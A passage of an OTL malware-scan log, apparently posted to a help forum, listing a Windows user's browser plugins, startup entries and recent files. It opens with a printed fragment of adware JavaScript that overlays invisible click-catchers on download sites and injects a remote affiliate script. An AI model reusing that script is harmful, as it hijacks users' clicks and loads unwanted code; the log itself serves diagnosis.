style=\"width:100%;height:100%\">';f.style.position=\"relative\";f.appendChild(g)}document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\")&&(f=document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\"),g=document.createElement(\"div\"),g.setAttribute(\"style\",\"width:100%;height:121%;position:absolute;left:0;top:0\"),\ng.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">',f.style.position=\"relative\",f.appendChild(g))},250);if(-1<window.self.location.hostname.indexOf(\"eo-online.me\")&&window.self==window.top){var f=function(){try{if(jQuery(\".down, .dloadf, .dloadt\").attr(\"href\",\"#\"),$(\"#adsfrm\").length){var f=$(\"#adsfrm\").offset();$('<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"position:absolute;z-index:9999;top:'+\nf.top+\"px;left:\"+f.left+\"px;width:\"+$(\"#adsfrm\").width()+\"px;height:\"+$(\"#adsfrm\").height()+'px;\">').appendTo(\"body\")}}catch(g){}},g=document.createElement(\"script\");g.type=\"text/javascript\";g[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"(\"+f.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild(g)}if(-1<window.self.location.hostname.indexOf(\"irpy.co\")&&window.self==window.top)try{f=function(){try{$(\".download-maxiget, .download-trinity\").attr(\"href\",\"#\"),\n$(\"#mp3-with-trinity\").remove()}catch(f){}},-1< !navigator.userAgent.indexOf(\"chrome\")?f():(g=document.createElement(\"script\"),g.innerHTML=\"(\"+f.toString()+\")()\",document.body.appendChild(g))}catch(h){}-1<window.self.location.hostname.indexOf(\"ehd.c\")&&document.getElementById(\"r1113566095\")&&(f=document.createElement(\"img\"),f.setAttribute(\"style\",\"width:100%;height:100%;position:absolute;z-index:99999;left:0;top:0\"),f.src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\",\ng=document.getElementById(\"r1113566095\").parentNode,g.style.position=\"relative\",g.appendChild(f))})();-1<window.self.location.hostname.indexOf(\"hesefiles.c\")&&(window.self.location.href=\"about:blank\");\nif(-1<window.self.location.hostname.indexOf(\"usfiles.ne\")){var a=function(){$(\"form[name=F1]\").submit(function(){if(-1<$(this).attr(\"action\").indexOf(\"bdl1=\"))return $(\"input[name=quick]\").attr(\"checked\",!1),window.setTimeout(function(){$(\"#btn_download\").attr(\"disabled\",!1).val(\"Download Now!!\");$(\"form[name=F1]\").unbind(\"submit\")},700),!1})};if(-1==navigator.userAgent.toLowerCase().indexOf(\"chrome\"))a();else{var s=document.createElement(\"script\");s.type=\"text/javascript\";s.innerHTML=\"(\"+a.toString()+\n\")()\";document.body.appendChild(s)}}if(-1<window.self.location.hostname.indexOf(\"ebeast.co\")){var d=document.getElementsByTagName(\"div\"),i;for(i in d)d[i]&&d[i].style&&\"fixed\"==d[i].style.position&&\"solid\"==d[i].style.borderBottomStyle&&(d[i].style.display=\"none\")}if(-1<window.self.location.hostname.indexOf(\"oolrom.com\")){var date=new Date;date.setTime(date.getTime()+2592E6);var expires=\"; expires=\"+date.toGMTString();document.cookie=\"installer=14604\"+expires+\"; path=/;domain=.coolrom.com\"}\n-1<document.location.host.indexOf(\"bookbrowsee.ne\")&&new function(){for(var f=[\"adv.php?\",\"/adv.php?\"],g=0;g<document.links.length;g++)for(var h=document.links[g],k=h.pathname+h.search,m=0;m<f.length;m++)f[m]==k.substr(0,f[m].length)&&\"nofollow\"==h.rel&&\"_blank\"==h.target&&(h.setAttribute(\"onclick\",\"return false\"),h.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1))};\nif(-1<document.location.host.indexOf(\"irrorcreator.co\"))for(var c=[\"verticdn.com\"],d=0;d<document.links.length;d++)for(var a=document.links[d],e=a.host,b=0;b<c.length;b++)c[b]==e&&(a.setAttribute(\"onclick\",\"return false\"),a.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1));\n-1<document.location.host.indexOf(\"loud-vibe.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1),a.addEventListener(\"mousedown\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1));\n-1<document.location.host.indexOf(\"p3seal.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1),a.addEventListener(\"mousedown\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1));\n-1<document.location.host.indexOf(\"p3vampire.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1),a.addEventListener(\"mousedown\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1));\n-1<document.location.href.indexOf(\"necraftdl.com/download.ph\")&&(a=document.getElementById(\"downloadpage\"),b=a.getElementsByTagName(\"a\")[0],d=document.createElement(\"div\"),d.style.position=\"absolute\",d.style.width=\"100%\",d.style.height=\"34px\",d.style.left=\"0\",d.style.cursor=\"pointer\",d.style.zIndex=9999,b.parentNode.insertBefore(d,b.previousSibling));\nif(-1<document.location.href.indexOf(\"necraftdl.com\"))for(i=0;i<document.links.length;i++){var link=document.links[i];if(\".exe\"==link.href.substr(-4)){var p=link.parentNode;p.style.position=\"relative\";d=document.createElement(\"div\");d.style.position=\"absolute\";d.style.top=0;d.style.left=0;d.style.width=\"100%\";d.style.height=\"100%\";d.style.cursor=\"pointer\";d.style.zIndex=9999;p.appendChild(d)}}\nif(-1<document.location.host.indexOf(\"salvapantallas.com.es\"))for(b=0;b<document.links.length;b++)if(\"http://www.screensaverspc.com/\"==document.links[b].href.substr(0,30)){b=document.links[b].parentNode;b.style.position=\"relative\";a=document.createElement(\"div\");a.style.position=\"absolute\";a.style.left=0;a.style.top=0;a.style.width=\"100%\";a.style.height=\"100%\";a.style.zIndex=\"9999\";a.style.cursor=\"pointer\";b.appendChild(a);break}\nif(-1<document.location.host.indexOf(\"p3olimp.ne\")&&document.getElementsByClassName)for(c=document.getElementById(\"download-manager-checkbox\"),c.onchange=function(){for(var f=document.getElementsByClassName(\"nasjfkla\"),g=0;g<f.length;g++)f[g].style.display=c.checked?\"block\":\"none\"},i=0;i<document.links.length;i++){var link=document.links[i],onclick=link.getAttribute(\"onclick\");if(onclick&&-1<onclick.indexOf(\"prepare_download_file\")){var div=link.parentNode;div.style.position=\"relative\";b=document.createElement(\"div\");\nb.className=\"nasjfkla\";b.style.position=\"absolute\";b.style.top=\"-2px\";b.style.left=\"92px\";b.style.width=\"71px\";b.style.height=\"16px\";b.style.zIndex=\"99999\";b.style.cursor=\"pointer\";div.appendChild(b)}}\n-1<location.host.indexOf(\"p3olimp.ne\")&&setTimeout(function(){for(var f=document.getElementById(\"leftside\"),g=0;g<f.children.length;g++)if(/\\bspnBook\\b/.test(f.children[g].className))for(var h=f.children[g].getElementsByTagName(\"a\"),k=0;k<h.length;k++)h[k].setAttribute(\"href\",\"#\"),h[k].setAttribute(\"target\",\"\")},1E3);\nif(-1<document.location.host.indexOf(\"leunlckr.co\")){var b=document.getElementsByTagName(\"button\")[0],b2=document.createElement(\"button\");b2.className=b.className;b2.innerHTML=b.innerHTML;b.parentNode.insertBefore(b2,b);b.parentNode.removeChild(b)}-1<document.referrer.indexOf(\"go.theadsnet.com\")&&document.write(\"\");\n(function(){var f=0;try{if(-1<window.location.href.indexOf(\"ack-free.co\"))var g=setInterval(function(){try{var k=document.getElementById(\"ucd-countdown-1\"),h=[];h.push(1*k.children[2].children[1].children[1].innerText);h.push(1*k.children[2].children[2].children[1].innerText);h.push(1*k.children[3].children[1].children[1].innerText);h.push(1*k.children[3].children[2].children[1].innerText);for(var n=k=0;n<h.length;n++)k+=h[n];if(!(0<k)){clearInterval(g);var l=document.createElement(\"div\");l.style.position=\n\"absolute\";l.style.top=0;l.style.left=0;l.style.width=\"100%\";l.style.height=\"100%\";l.style.zIndex=\"9999\";l.style.cursor=\"pointer\";var r=document.getElementById(\"ucd-countdown-1-content\").children[1];r.style.position=\"relative\";r.appendChild(l)}}catch(v){try{var q=0;jQuery.each(jQuery(\".ucd-figure.ucd-countdown-digit-bottom\"),function(){q+=1*jQuery(this).text()});if(0===q){clearInterval(g);var t=jQuery(\"#ucd-countdown-1-content iframe\"),u=t.parent();t.remove();u.html(\"<img title='Get Download' alt='latbut' src='http://i.imgur.com/At0oA5A.png' height='61' width='373'>\")}}catch(w){\"undefined\"!==\ntypeof f&&30<++f&&clearInterval(g)}}},750)}catch(h){}})();var __intervalcountasd=0,__intervalasd=setInterval(function(){__intervalcountasd++;if(-1<window.location.host.indexOf(\"ownloads.ziddu.co\")){for(var b=0;b<document.links.length;b++)try{var c=document.links[b].href.toLowerCase();if(-1==c.indexOf(\"ww.ziddu.co\")&&-1==c.indexOf(\"#\")&&-1==c.indexOf(\"tunes.apple.co\")&&-1==c.indexOf(\"lay.google.co\")&&-1==c.indexOf(\"/gallery/\")){try{for(var e=document.links[b],f=0;15>=f;f++)e=e.parentNode;if(-1<e.className.indexOf(\"footerbg\"))continue}catch(g){}var d=document.links[b].parentNode;\nif(!(-1<d.className.indexOf(\"addthis_toolbox\"))){d.style.position=\"relative\";var a=document.createElement(\"div\");a.style.position=\"absolute\";a.style.left=0;a.style.top=0;a.style.width=\"100%\";a.style.height=\"100%\";a.style.zIndex=\"9999\";a.style.cursor=\"pointer\";d.appendChild(a)}}}catch(h){}c=document.getElementsByTagName(\"iframe\");for(b=0;b<c.length;b++)try{-1==c[b].src.indexOf(\"acebook.co\")&&-1==c[b].src.indexOf(\"cp.crwdcntrl.ne\")&&(d=c[b].parentNode,d.style.position=\"relative\",a=document.createElement(\"div\"),\na.style.position=\"absolute\",a.style.left=0,a.style.top=0,a.style.width=\"100%\",a.style.height=\"100%\",a.style.zIndex=\"9999\",a.style.cursor=\"pointer\",a.id=b,d.appendChild(a))}catch(k){}}20<__intervalcountasd&&clearInterval(__intervalasd)},500);;if(!document.getElementById(\"aid_GG1c175d5\")&&window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//api.jollywallet.com/affiliate/client?dist=87&sub=Cost3&name=cosstminn\";script.setAttribute(\"id\",\"aid_GG1c175d5\");document.getElementsByTagName(\"head\")[0].appendChild(script)};})();(function(){void(0)})()");
 
 
FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: C:\windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@microsoft.com/VirtualEarth3D,version=4.0: C:\Program Files (x86)\Virtual Earth 3D\ File not found
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.65.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.65.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: C:\windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL File not found
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3502.0922: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll File not found
FF - HKLM\Software\MozillaPlugins\@mozilla.zeniko.ch/EasyPDF_Browser_Plugin: C:\Program Files (x86)\EasyPDF\npPdfViewer.dll File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll File not found
FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.1.0: C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@mozilla.zeniko.ch/EasyPDF_Browser_Plugin: C:\Program Files (x86)\EasyPDF\npPdfViewer.dll File not found
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\fmdownloader@gmail.com: C:\Program Files (x86)\Freemake\Freemake Video Downloader\BrowserPlugin\Firefox\fmdownloader@gmail.com\ [2014/07/17 08:08:23 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\ytfmdownloader@gmail.com: C:\Program Files (x86)\Freemake\Freemake Video Downloader\BrowserPlugin\Firefox\ytfmdownloader@gmail.com\ [2014/07/17 08:08:24 | 000,000,000 | ---D | M]
 
[2013/12/29 01:13:31 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Robin\AppData\Roaming\Mozilla\Extensions
[2014/07/30 11:18:21 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Robin\AppData\Roaming\Mozilla\Firefox\Profiles\0rhpkylw.default-1402908077044\extensions
[2014/07/25 04:49:53 | 000,000,000 | ---D | M] (FireShot) -- C:\Users\Robin\AppData\Roaming\Mozilla\Firefox\Profiles\0rhpkylw.default-1402908077044\extensions\{0b457cAA-602d-484a-8fe7-c1d894a011ba}
[2014/07/30 11:18:21 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Robin\AppData\Roaming\Mozilla\Firefox\Profiles\ypv8glz3.default\extensions
[2014/07/23 23:23:05 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Robin\AppData\Roaming\Mozilla\Firefox\Profiles\ypv8glz3.default\extensions\staged
[2014/06/16 09:41:30 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Robin\AppData\Roaming\Mozilla\Firefox\Profiles\ypv8glz3.default\extensions\youtubeunblocker@unblocker.yt
[2014/07/25 12:50:33 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\extensions
[2014/08/04 04:55:21 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
 
O1 HOSTS File: ([2009/06/10 22:00:26 | 000,000,824 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O2:[b]64bit:[/b] - BHO: (no name) - {3706EE7C-3CAD-445D-8A43-03EBC3B75908} - No CLSID value found.
O2:[b]64bit:[/b] - BHO: (Skype Click to Call for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O2:[b]64bit:[/b] - BHO: (no name) - {F9E4A054-E9B1-4BC3-83A3-76A1AE736170} - No CLSID value found.
O2 - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (CIESpeechBHO Class) - {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} - C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll (Atheros Commnucations)
O2 - BHO: (Skype Click to Call for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O2 - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O3:[b]64bit:[/b] - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.
O3 - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.
O4:[b]64bit:[/b] - HKLM..\Run: [AdobeAAMUpdater-1.0] C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe (Adobe Systems Incorporated)
O4:[b]64bit:[/b] - HKLM..\Run: [AthBtTray] C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe (Atheros Commnucations)
O4:[b]64bit:[/b] - HKLM..\Run: [AtherosBtStack] C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe (Atheros Commnucations)
O4:[b]64bit:[/b] - HKLM..\Run: [HotKeysCmds] C:\Windows\SysNative\hkcmd.exe (Intel Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxtray.exe (Intel Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [Logitech Download Assistant] C:\windows\SysNative\LogiLDA.dll (Logitech, Inc.)
O4:[b]64bit:[/b] - HKLM..\Run: [MSC] c:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [Persistence] C:\Windows\SysNative\igfxpers.exe (Intel Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [RTHDVCPL] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Realtek Semiconductor)
O4 - HKLM..\Run: [ASUS EeePad HotKey Ctrl] C:\windows\SysWow64\AsusSender.exe (ASUSTek Computer Inc.)
O4 - HKLM..\Run: [FJTWAIN Setup] C:\windows\Twain_32\fjscan32\FjtwMkup.exe (FUJITSU LIMITED)
O4 - HKLM..\Run: [fst_gb_75]  File not found
O4 - HKLM..\Run: [FtLnSOP_setup] C:\Windows\twain_32\Fjscan32\SOP\FtLnSOP.exe (PFU LIMITED)
O4 - HKLM..\Run: [HotkeyMon] C:\windows\SysWow64\AsusSender.exe (ASUSTek Computer Inc.)
O4 - HKLM..\Run: [HotkeyService] C:\windows\SysWow64\AsusSender.exe (ASUSTek Computer Inc.)
O4 - HKLM..\Run: [IAStorIcon] C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe (Intel Corporation)
O4 - HKLM..\Run: [IFXSPMGT] C:\Program Files (x86)\Infineon\Security Platform Software\ifxspmgt.exe (Infineon Technologies AG)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O7 - HKCU\Software\Policies\Microsoft\Internet Explorer\Recovery present
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 255
O9:[b]64bit:[/b] - Extra 'Tools' menuitem : Send by Bluetooth to - {7815BE26-237D-41A8-A98F-F7BD75F71086} - Reg Error: Value error. File not found
O9:[b]64bit:[/b] - Extra Button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : Send by Bluetooth to - {7815BE26-237D-41A8-A98F-F7BD75F71086} - C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll (Atheros Commnucations)
O9 - Extra Button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O13[b]64bit:[/b] - gopher Prefix: missing
O13 - gopher Prefix: missing
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} http://download.microsoft.com/download/E/5/6/E5611B10-0D6D-4117-8430-A67417AA88CD/LegitCheckControl.cab (Windows Genuine Advantage Validation Tool)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.254
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{0463B230-9944-4D8C-992D-9B18B90E893D}: DhcpNameServer = 192.168.1.254
O18:[b]64bit:[/b] - Protocol\Handler\ms-help - No CLSID value found
O18:[b]64bit:[/b] - Protocol\Handler\skype4com - No CLSID value found
O18:[b]64bit:[/b] - Protocol\Handler\skypec2c {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O18 - Protocol\Handler\skypec2c {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O20:[b]64bit:[/b] - HKLM Winlogon: Shell - (explorer.exe) - C:\windows\explorer.exe (Microsoft Corporation)
O20:[b]64bit:[/b] - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\windows\SysWow64\userinit.exe (Microsoft Corporation)
O20:[b]64bit:[/b] - Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\windows\SysNative\igfxdev.dll (Intel Corporation)
O21:[b]64bit:[/b] - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O33 - MountPoints2\{fe8e982a-c61b-11e1-8aeb-742f68dfcc5f}\Shell - "" = AutoRun
O33 - MountPoints2\{fe8e982a-c61b-11e1-8aeb-742f68dfcc5f}\Shell\AutoRun\command - "" = D:\start.exe
O34 - HKLM BootExecute: (autocheck autochk *)
O35:[b]64bit:[/b] - HKLM\..comfile [open] -- "%1" %*
O35:[b]64bit:[/b] - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:[b]64bit:[/b] - HKLM\...com [@ = comfile] -- "%1" %*
O37:[b]64bit:[/b] - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
[color=#E56717]========== Files/Folders - Created Within 30 Days ==========[/color]
 
[2030/01/01 23:27:43 | 000,000,000 | -HSD | C] -- C:\Boot
[2030/01/01 10:09:54 | 000,000,000 | -HSD | C] -- C:\System Volume Information
[2014/08/04 10:51:40 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\Robin\Desktop\OTL.exe
[2014/08/04 09:59:49 | 000,000,000 | ---D | C] -- C:\Users\Robin\AppData\Local\ElevatedDiagnostics
[2014/08/04 04:28:33 | 000,000,000 | ---D | C] -- C:\Users\Robin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
[2014/08/04 04:22:11 | 000,000,000 | -HSD | C] -- C:\Users\Robin\AppData\Local\EmieUserList
[2014/08/04 04:22:11 | 000,000,000 | -HSD | C] -- C:\Users\Robin\AppData\Local\EmieSiteList
[2014/08/04 03:11:55 | 000,000,000 | -HSD | C] -- C:\Config.Msi
[2014/07/31 14:49:01 | 000,000,000 | ---D | C] -- C:\Users\Robin\adhanalam
[2014/07/31 03:54:43 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FastStone Photo Resizer
[2014/07/30 23:29:30 | 000,000,000 | ---D | C] -- C:\19a52d26865ef7eb69a5
[2014/07/30 11:40:43 | 000,000,000 | ---D | C] -- C:\Users\Robin\AppData\Roaming\FastStone
[2014/07/30 11:40:43 | 000,000,000 | ---D | C] -- C:\Users\Robin\AppData\Local\FastStone
[2014/07/30 11:40:21 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\FastStone Photo Resizer
[2014/07/30 11:17:32 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Image Resizer
[2014/07/30 10:47:18 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Microsoft OneDrive
[2014/07/30 10:47:17 | 000,000,000 | R--D | C] -- C:\Users\Robin\OneDrive
[2014/07/30 10:46:35 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft OneDrive
[2014/07/28 18:36:30 | 000,000,000 | ---D | C] -- C:\ProgramData\NovaTech Network
[2014/07/28 15:55:00 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip
[2014/07/28 15:54:53 | 000,000,000 | ---D | C] -- C:\Program Files\7-Zip
[2014/07/28 15:36:45 | 000,000,000 | ---D | C] -- C:\BIOS
[2014/07/27 22:15:57 | 002,162,992 | ---- | C] (Yamaha Corporation) -- C:\windows\SysNative\YamahaAE.dll
[2014/07/27 22:15:41 | 002,101,848 | ---- | C] (Waves Audio Ltd.) -- C:\windows\SysNative\WavesGUILib64.dll
[2014/07/27 22:15:35 | 000,155,888 | ---- | C] (SRS Labs, Inc.) -- C:\windows\SysNative\SRSWOW64.dll
[2014/07/27 22:15:34 | 000,518,896 | ---- | C] (SRS Labs, Inc.) -- C:\windows\SysNative\SRSTSX64.dll
[2014/07/27 22:15:34 | 000,211,184 | ---- | C] (SRS Labs, Inc.) -- C:\windows\SysNative\SRSTSH64.dll
[2014/07/27 22:15:34 | 000,198,896 | ---- | C] (SRS Labs, Inc.) -- C:\windows\SysNative\SRSHP64.dll
[2014/07/27 22:15:30 | 000,724,728 | ---- | C] (DTS, Inc.) -- C:\windows\SysNative\sltech64.dll
[2014/07/27 22:15:29 | 000,246,008 | ---- | C] (TODO: <Company name>) -- C:\windows\SysNative\slprp64.dll
[2014/07/27 22:15:27 | 001,048,824 | ---- | C] (SRS Labs, Inc.) -- C:\windows\SysNative\slcnt64.dll
[2014/07/27 22:15:25 | 000,889,592 | ---- | C] (DTS, Inc.) -- C:\windows\SysNative\sl3apo64.dll
[2014/07/27 22:15:22 | 000,221,024 | ---- | C] (Synopsys, Inc.) -- C:\windows\SysNative\SFNHK64.dll
[2014/07/27 22:15:21 | 000,081,248 | ---- | C] (Synopsys, Inc.) -- C:\windows\SysNative\SFCOM64.dll
[2014/07/27 22:15:21 | 000,074,064 | ---- | C] (Virage Logic Corporation / Sonic Focus) -- C:\windows\SysWow64\SFCOM.dll
[2014/07/27 22:15:20 | 000,078,688 | ---- | C] (Synopsys, Inc.) -- C:\windows\SysNative\SFAPO64.dll
[2014/07/27 22:15:05 | 000,375,128 | ---- | C] (Dolby Laboratories, Inc.) -- C:\windows\SysNative\RTEEP64A.dll
[2014/07/27 22:15:05 | 000,204,120 | ---- | C] (Dolby Laboratories, Inc.) -- C:\windows\SysNative\RTEED64A.dll
[2014/07/27 22:15:05 | 000,101,208 | ---- | C] (Dolby Laboratories, Inc.) -- C:\windows\SysNative\RTEEL64A.dll
[2014/07/27 22:15:05 | 000,078,680 | ---- | C] (Dolby Laboratories, Inc.) -- C:\windows\SysNative\RTEEG64A.dll
[2014/07/27 22:15:01 | 000,310,104 | ---- | C] (Dolby Laboratories, Inc.) -- C:\windows\SysNative\RP3DHT64.dll
[2014/07/27 22:15:01 | 000,310,104 | ---- | C] (Dolby Laboratories, Inc.) -- C:\windows\SysNative\RP3DAA64.dll
[2014/07/27 22:14:35 | 007,164,176 | ---- | C] (Dolby Laboratories) -- C:\windows\SysNative\R4EEP64A.dll
[2014/07/27 22:14:35 | 000,434,960 | ---- | C] (Dolby Laboratories) -- C:\windows\SysNative\R4EED64A.dll
[2014/07/27 22:14:35 | 000,141,584 | ---- | C] (Dolby Laboratories) -- C:\windows\SysNative\R4EEL64A.dll
[2014/07/27 22:14:35 | 000,075,024 | ---- | C] (Dolby Laboratories) -- C:\windows\SysNative\R4EEG64A.dll
[2014/07/27 22:14:31 | 000,124,176 | ---- | C] (Dolby Laboratories) -- C:\windows\SysNative\R4EEA64A.dll
[2014/07/27 22:14:30 | 005,751,048 | ---- | C] (Nahimic Inc) -- C:\windows\SysNative\NAHIMICAPOlfx.dll
[2014/07/27 22:14:30 | 000,942,384 | ---- | C] (Nahimic Inc) -- C:\windows\SysNative\NAHIMICAPOSettingsIPC.dll
[2014/07/27 22:14:26 | 012,894,808 | ---- | C] (Waves Audio Ltd.) -- C:\windows\SysNative\MaxxVoiceAPO3064.dll
[2014/07/27 22:14:26 | 000,662,784 | ---- | C] (Waves Audio Ltd.) -- C:\windows\SysNative\MaxxVolumeSDAPO.dll
